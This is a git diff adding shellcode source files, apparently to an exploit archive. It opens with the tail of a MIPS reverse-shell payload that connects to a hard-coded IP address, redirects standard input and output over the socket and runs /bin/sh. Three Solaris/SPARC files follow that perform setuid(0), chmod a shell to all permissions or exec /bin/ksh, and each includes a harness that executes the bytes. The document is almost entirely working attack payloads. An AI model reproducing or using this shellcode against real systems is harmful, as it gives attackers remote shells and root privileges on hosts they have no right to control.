"\x24\x0c\x5d\xb8" // li $t0, 0x5db8 # 93.184 << XXX ip1 + "\xa7\xac\xff\xf0" // sh $t0, -16($sp) + "\x34\x0c\xd8\x22" // li $t0, 0xd822 # 216.34 << XXX ip2 + "\xa7\xac\xff\xf2" // sh $t0, -14($sp) + "\x27\xa5\xff\xec" // addiu $a1, $sp, -20 + "\x39\xc6\x21\x31" // xori $a2, $t2, 0x2131 # 16 + "\x24\x02\x17\x99" // li $v0, 0x1799 # connect (0x1799) + "\x01\x01\x01\x0c" // .byte 0x01, 0x01, 0x01, 0x0c # syscall + + // add overflow technique + "\x24\x0f\x7f\x7f" // li $t3, 0x7f7f + + // dup2(sock, 0) + "\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock + "\x25\xe5\x80\x81" // addiu $a1, $t3, 0x8081 # 0 + "\x24\x02\x17\x90" // dup2 (0x1790) + "\x01\x01\x01\x0c" // syscall 0x40404 + + // dup2(sock, 1) + "\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock + "\x25\xe5\x80\x82" // addiu $a1, $t3, 0x8082 # 1 + "\x24\x02\x17\x90" // dup2 (0x1790) + "\x01\x01\x01\x0c" // syscall 0x40404 + + // dup2(sock, 2) + "\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock + "\x25\xe5\x80\x83" // addiu $a1, $t3, 0x8083 # 2 + "\x24\x02\x17\x90" // dup2 (0x1790) + "\x01\x01\x01\x0c" // syscall 0x40404 + + // execve("/bin/sh", ["/bin/sh"], 0) + "\x3c\x0c\x2f\x62" // lui $t0, 0x2f62 # "/b" + "\x25\x8c\x69\x6e" // addiu $t0, 0x696e # "in" + "\xaf\xac\xff\xec" // sw $t0, -20($sp) + "\x3c\x0c\x2f\x73" // lui $t0, 0x2f73 # "/s" + "\x25\x8c\x68\x68" // addiu $t0, 0x6868 # "hh" + "\xaf\xac\xff\xf0" // sw $t0, -16($sp) + "\xa3\xa0\xff\xf3" // sb $zero, -13($sp) # NUL + "\x27\xa4\xff\xec" // addiu $a0, $sp, -20 + "\xaf\xa4\xff\xf8" // sw $a0, -8($sp) + "\xaf\xa0\xff\xfc" // sw $zero, -4($sp) + "\x27\xa5\xff\xf8" // addiu $a1, $sp, -8 + "\x28\x06\xff\xff" // slti $a2, $zero, -1 # 0 (slti technique) + "\x24\x02\x17\xa9" // li $v0, 0x17a9 # execve (0x17a9) + "\x01\x01\x01\x0c"; // syscall 0x40404 + + void (*f)() = (void *)sc; + f(); +} \ No newline at end of file diff --git a/shellcodes/solaris_sparc/50748.c b/shellcodes/solaris_sparc/50748.c new file mode 100644 index 000000000..e22f7b998 --- /dev/null +++ b/shellcodes/solaris_sparc/50748.c @@ -0,0 +1,38 @@ +/* + * sparc_solaris_chmod.c - Solaris/SPARC chmod() shellcode + * Copyright (c) 2022 Marco Ivaldi + * + * Solaris/SPARC setuid/chmod/exit shellcode. + * + * Tested on: + * SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise + */ + +char sc[] = /* Solaris/SPARC chmod() shellcode (12 + 32 + 20 = 64 bytes) */ + +/* setuid(0) */ +"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */ +"\x82\x10\x20\x17" /* mov 0x17, %g1 */ +"\x91\xd0\x20\x08" /* ta 8 */ + +/* chmod("/bin/ksh", 037777777777) */ +"\x92\x20\x20\x01" /* sub %g0, 1, %o1 */ +"\x20\xbf\xff\xff" /* bn,a */ +"\x20\xbf\xff\xff" /* bn,a */ +"\x7f\xff\xff\xff" /* call */ +"\x90\x03\xe0\x20" /* add %o7, 0x20, %o0 */ +"\xc0\x22\x20\x08" /* clr [ %o0 + 8 ] */ +"\x82\x10\x20\x0f" /* mov 0xf, %g1 */ +"\x91\xd0\x20\x08" /* ta 8 */ + +/* exit(0) */ +"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */ +"\x82\x10\x20\x01" /* mov 1, %g1 */ +"\x91\xd0\x20\x08" /* ta 8 */ +"/bin/ksh"; + +void main() +{ + void (*f)() = (void *)sc; + f(); +} \ No newline at end of file diff --git a/shellcodes/solaris_sparc/50749.c b/shellcodes/solaris_sparc/50749.c new file mode 100644 index 000000000..aee0fddef --- /dev/null +++ b/shellcodes/solaris_sparc/50749.c @@ -0,0 +1,29 @@ +/* + * sparc_solaris_chmod2.c - Solaris/SPARC chmod() shellcode + * Copyright (c) 2022 Marco Ivaldi + * + * Very small Solaris/SPARC chmod shellcode. See also: + * http://phrack.org/issues/70/13.html#article + * + * Tested on: + * SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise + */ + +char sc[] = /* Solaris/SPARC chmod() shellcode (max size is 36 bytes) */ + +/* chmod("./me", 037777777777) */ +"\x92\x20\x20\x01" /* sub %g0, 1, %o1 */ +"\x20\xbf\xff\xff" /* bn,a */ +"\x20\xbf\xff\xff" /* bn,a */ +"\x7f\xff\xff\xff" /* call */ +"\x90\x03\xe0\x14" /* add %o7, 0x14, %o0 */ +"\xc0\x22\x20\x04" /* clr [ %o0 + 4 ] */ +"\x82\x10\x20\x0f" /* mov 0xf, %g1 */ +"\x91\xd0\x20\x08" /* ta 8 */ +"./me"; + +void main() +{ + void (*f)() = (void *)sc; + f(); +} \ No newline at end of file diff --git a/shellcodes/solaris_sparc/50750.c b/shellcodes/solaris_sparc/50750.c new file mode 100644 index 000000000..8a25bb8c9 --- /dev/null +++ b/shellcodes/solaris_sparc/50750.c @@ -0,0 +1,35 @@ +/* + * sparc_solaris_exec.c - Solaris/SPARC execve() shellcode + * Copyright (c) 2022 Marco Ivaldi + * + * Pretty standard Solaris/SPARC setuid/execve shellcode. + * + * Tested on: + * SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise + */ + +char sc[] = /* Solaris/SPARC execve() shellcode (12 + 48 = 60 bytes) */ + +/* setuid(0) */ +"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */ +"\x82\x10\x20\x17" /* mov 0x17, %g1 */ +"\x91\xd0\x20\x08" /* ta 8 */ + +/* execve("/bin/ksh", argv, NULL) */ +"\x9f\x41\x40\x01" /* rd %pc,%o7 ! >= sparcv8+ */ +"\x90\x03\xe0\x28" /* add %o7, 0x28, %o0 */ +"\x92\x02\x20\x10" /* add %o0, 0x10, %o1 */ +"\xc0\x22\x20\x08" /* clr [ %o0 + 8 ] */ +"\xd0\x22\x20\x10" /* st %o0, [ %o0 + 0x10 ] */ +"\xc0\x22\x20\x14" /* clr [ %o0 + 0x14 ] */ +"\x82\x10\x20\x0b" /* mov 0xb, %g1 */ +"\x91\xd0\x20\x08" /* ta 8 */ +"\x80\x1c\x40\x11" /* xor %l1, %l1, %g0 ! nop */ +"\x41\x41\x41\x41" /* placeholder */ +"/bin/ksh"; + +void main() +{ + void (*f)() = (void *)sc; + f(); +} \ No newline at end of file